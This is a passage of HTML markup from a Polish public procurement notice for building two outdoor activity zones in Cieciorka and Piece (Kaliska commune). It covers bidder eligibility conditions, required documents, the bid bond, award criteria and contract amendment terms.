id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2018-10-08</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy niepodlegają wykluczeniu na podstawie przesłanek określonych w art. 24 ust. 1 pkt - 23 oraz napodstawie art. 24 ust. 5 pkt 1 Ustawy Pzp oraz spełniają warunki udziału w postępowaniuInformacje dodatkowe</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Wykonawca spełni warunek, jeśli wykaże, że jest ubezpieczony ododpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotemzamówienia, na kwotę nie mniejszą niż 50.000,00 zł</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Wykonawca spełni warunek, jeśli wykaże, że: a) w zakresie wiedzy idoświadczenia: w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okresprowadzenia działalności jest krótszy - w tym okresie, wykonał należycie, zgodnie z przepisamiprawa i prawidłowo ukończył, co najmniej dwie roboty budowlane obejmujące swoim zakresemzagospodarowanie terenu ogólnodostępnego wraz z montażem urządzeń małej architektury, owartości robót nie mniejszej niż 100.000,00 zł brutto (słownie: sto tysięcy złotych). Uwaga! -Wykonawca nie może sumować wartości kilku robót budowlanych wymienionych powyżej omniejszym zakresie dla uzyskania wymaganej wartości porównywalnej. - W niniejszej SIWZdefinicje budowy, przebudowy lub rozbudowy należy rozumieć zgodnie z definicjami ustawy zdnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2017 r., poz. 1332 ze zm.). b) w zakresiedysponowania osobami do wykonania zamówienia - Wykonawca winien wykazać, że skieruje dorealizacji zamówienia publicznego osoby, posiadające kwalifikacje zawodowe, uprawnienia,doświadczenie i wykształcenie niezbędne do wykonania zamówienia publicznego, tj.: i. jednaosoba, która będzie pełniła funkcję Kierownika Budowy, posiadająca uprawnienia budowlane dokierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej lub odpowiadająceim ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązującychprzepisów prawa Uwaga! Osoby wskazane w lit. b powyżej powinny posiadać uprawnieniabudowlane zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2017 r., poz. 1322ze zm.) oraz rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. wsprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014 r., poz. 1278) lubodpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniejobowiązujących przepisów. Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy mogą również wykonywać osoby,których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisachodrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 22 grudnia 2015 r. o zasadachuznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2016 r., poz. 65).</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">1. W celu wstępnego potwierdzenia, że Wykonawca nie podlega wykluczeniu z postępowania orazspełnia warunki udziału w postępowaniu Wykonawca składa wraz ofertą: 1) aktualne na dzieńskładania ofert oświadczenie o niepodleganiu wykluczeniu z postępowania - załącznik nr 3 doSIWZ, 2) aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału wpostępowaniu - załącznik nr 2 do SIWZ, 3) zobowiązanie do oddania do dyspozycji zasobów -jeżeli Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu polega nazdolnościach innych podmiotów, którego wzór stanowi załącznik nr 9 do SIWZ.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1) odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej,jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia brakupodstaw do wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp,</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">3) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przedupływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tymokresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzeczktórych roboty te zostały wykonane, z załączeniem dowodów określających czy te robotybudowlane zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone,przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przezpodmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczynyo obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - innedokumenty; wzór wykazu robót stanowi załącznik nr 5 do SIWZ, 4) wykaz osób, skierowanychprzez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych zaświadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień,doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a takżezakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymiosobami; wzór wykazu osób stanowi załącznik nr 7 do SIWZ.</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1. Formularz oferty - załącznik nr 1. 2. Oświadczenie o spełnianiu warunków udziału wpostępowaniu - załącznik nr 2. 3. Oświadczenie Wykonawcy o braku podstaw do jego wykluczenia- załącznik nr 3. 4. Oświadczenie o przynależności lub braku przynależności do grupy kapitałowej- załącznik nr 4. 5. Wykaz wykonanych robót budowlanych - załącznik nr 5. 6. Oświadczenie oprzekazaniu prac podwykonawcom - załącznik nr 6. 7. Wykaz osób, które będą uczestniczyć wwykonaniu zamówienia - załącznik nr 7. 8. Wzór umowy - załącznik nr 8. 9. Zobowiązanie dooddania do dyspozycji zasobów - załącznik nr 9.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">1. Każdy Wykonawca przystępujący do przetargu obowiązany jest wnieść wadium przed upływemterminu składania ofert, w wysokości 4.000,00 zł (słownie: cztery tysiące złotych). 2. Wadiummoże być wnoszone w jednej lub kilku następujących formach: 1) pieniądzu, 2) poręczeniachbankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym żeporęczenie kasy jest zawsze poręczeniem pieniężnym, 3) gwarancjach bankowych, 4) gwarancjachubezpieczeniowych, 5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji RozwojuPrzedsiębiorczości (Dz. U. z 2016 r., poz. 359). 3. W przypadku, kiedy wadium wnoszone jest wpieniądzu, należy je wpłacić przelewem z dopiskiem: ,,Budowa dwóch Otwartych Stref Aktywnościna terenie działki nr 323/18 w miejscowości Cieciorka oraz 338 w miejscowości Piece, gminaKaliska" na następujące konto: Bank Spółdzielczy Skórcz o/Zblewo, nr 51 8342 0009 4000 01272000 0005 (ksero przelewu należy dołączyć do oferty) 4. Zamawiający zwróci wadium wszystkimWykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania,z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza. 5. Wykonawcy,którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwróci wadium niezwłoczniepo zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenianależytego wykonania umowy, jeżeli jego wniesienia żądano. 6. Zamawiający zwróci niezwłoczniewadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert. 7. Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu zwróconowadium zgodnie z pkt. 4, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybranajako najkorzystniejsza. Wykonawca wniesie wadium w terminie określonym przez Zamawiającego.8. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta zostaławybrana: 1) odmówił podpisania umowy na warunkach określonych w ofercie, 2) zawarcie umowystało się niemożliwe z przyczyn leżących po stronie Wykonawcy. 9. Zamawiający zatrzymujewadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust. 3 i 3a ustawy Pzp, z przyczyn leżących po jego stronie, nie złożył oświadczeń lubdokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 ustawy Pzp,oświadczenia, o którym mowa w art. 25a ust. 1, pełnomocnictw lub nie wyraził zgody napoprawienie omyłki, o której mowa w art. 87 ust 2 pkt 3 ustawy Pzp, co spowodowało brakmożliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej. 10. Jeżeli wadiumzostało wniesione w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowyrachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzeniarachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowywskazany przez Wykonawcę. Wymaga się załączenia do oferty dokumentu wniesienia wadium.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres gwarancji</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1. Wzór umowy jaka zostanie zawarta z wybranym Wykonawcą stanowi załącznik nr 8 do SIWZ. 2.Wszelkie zmiany i uzupełnienia Umowy mogą nastąpić wyłącznie na podstawie przepisów ustawyPrawo zamówień publicznych, za zgodą obu Stron i pod rygorem nieważności wymagają formypisemnej. 3. Na podstawie art. 144 ust. 1 pkt 1 ustawy Pzp, Zamawiający przewiduje możliwośćdokonania istotnych zmian postanowień umowy zawartej z wybranym Wykonawcą w następujących okolicznościach: 1) zmiany Umowy w zakresie wykonania robót budowlanych - Zamawiającyprzewiduje możliwość zmian postanowień zawartej Umowy w stosunku do treści oferty na podstawiektórej dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okolicznościwymienionych poniżej: a. Zamawiający ma prawo, jeżeli jest to niezbędne, dokonać takich zmianjakości, ilości lub technologii robót lub ich części określonych w zamówieniu, jeżeli uzna, że są oneniezbędne do 